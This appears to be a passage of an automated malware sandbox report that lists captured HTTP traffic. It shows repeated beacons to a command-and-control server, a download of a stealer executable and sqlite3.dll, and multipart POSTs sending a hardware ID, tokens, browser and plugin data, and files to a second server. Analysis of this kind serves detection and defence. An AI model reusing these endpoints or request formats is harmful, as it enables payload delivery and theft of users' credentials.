                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81If-Modified-Since: Thu, 04 Jul 2024 23:59:33 GMTIf-None-Match: "66873765-26d400"
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000006001&unit=246122658369
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDBHost: 85.28.47.30Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 46 45 35 36 43 42 38 36 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 2d 2d 0d 0a Data Ascii: ------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="hwid"9EFE56CB86684217651120------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="build"Nice------AFCFHJJECAEHJJKEHIDB--
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGIEHIJKKFIDHDGIDHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 62 35 62 61 38 66 35 66 33 64 36 33 64 33 38 65 32 61 33 61 35 35 32 32 37 38 34 66 39 64 65 63 66 30 64 33 37 64 39 65 64 65 37 31 61 61 32 62 33 66 35 62 35 61 39 38 34 61 61 31 65 63 35 65 35 64 31 64 66 66 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 49 45 48 49 4a 4b 4b 46 49 44 48 44 47 49 44 2d 2d 0d 0a Data Ascii: ------HJJEGIEHIJKKFIDHDGIDContent-Disposition: form-data; name="token"ab5ba8f5f3d63d38e2a3a5522784f9decf0d37d9ede71aa2b3f5b5a984aa1ec5e5d1dff9------HJJEGIEHIJKKFIDHDGIDContent-Disposition: form-data; name="message"browsers------HJJEGIEHIJKKFIDHDGID--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAAFBGDBKKEBGCFCBFHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 62 35 62 61 38 66 35 66 33 64 36 33 64 33 38 65 32 61 33 61 35 35 32 32 37 38 34 66 39 64 65 63 66 30 64 33 37 64 39 65 64 65 37 31 61 61 32 62 33 66 35 62 35 61 39 38 34 61 61 31 65 63 35 65 35 64 31 64 66 66 39 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 41 46 42 47 44 42 4b 4b 45 42 47 43 46 43 42 46 2d 2d 0d 0a Data Ascii: ------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="token"ab5ba8f5f3d63d38e2a3a5522784f9decf0d37d9ede71aa2b3f5b5a984aa1ec5e5d1dff9------EBAAAFBGDBKKEBGCFCBFContent-Disposition: form-data; name="message"plugins------EBAAAFBGDBKKEBGCFCBF--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGDGDHDGDBFIDHDBAHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 62 35 62 61 38 66 35 66 33 64 36 33 64 33 38 65 32 61 33 61 35 35 32 32 37 38 34 66 39 64 65 63 66 30 64 33 37 64 39 65 64 65 37 31 61 61 32 62 33 66 35 62 35 61 39 38 34 61 61 31 65 63 35 65 35 64 31 64 66 66 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 2d 2d 0d 0a Data Ascii: ------AKJDGDGDHDGDBFIDHDBAContent-Disposition: form-data; name="token"ab5ba8f5f3d63d38e2a3a5522784f9decf0d37d9ede71aa2b3f5b5a984aa1ec5e5d1dff9------AKJDGDGDHDGDBFIDHDBAContent-Disposition: form-data; name="message"fplugins------AKJDGDGDHDGDBFIDHDBA--
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIEGHJEGHJKFIEBFHJKHost: 85.28.47.30Content-Length: 6563Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.30Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFIDAAEHIEGCBFIDBFHost: 85.28.47.30Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFIIEBKEGHJJJJJJDAHost: 85.28.47.30Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDBAEGIIIEBGCAAFHIHost: 85.28.47.30Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 62 35 62 61 38 66 35 66 33 64 36 33 64 33 38 65 32 61 33 61 35 35 32 32 37 38 34 66 39 64 65 63 66 30 64 33 37 64 39 65 64 65 37 31 61 61 32 62 33 66 35 62 35 61 39 38 34 61 61 31 65 63 35 65 35 64 31 64 66 66 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 42 41 45 47 49 49 49 45 42 47 43 41 41 46 48 49 2d 2d 0d 0a Data Ascii: ------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="token"ab5ba8f5f3d63d38e2a3a5522784f9decf0d37d9ede71aa2b3f5b5a984aa1ec5e5d1dff9------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------KEHDBAEGIIIEBGCAAFHIContent-Disposition: form-data; name="file"------KEHDBAEGIIIEBGCAAFHI--
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
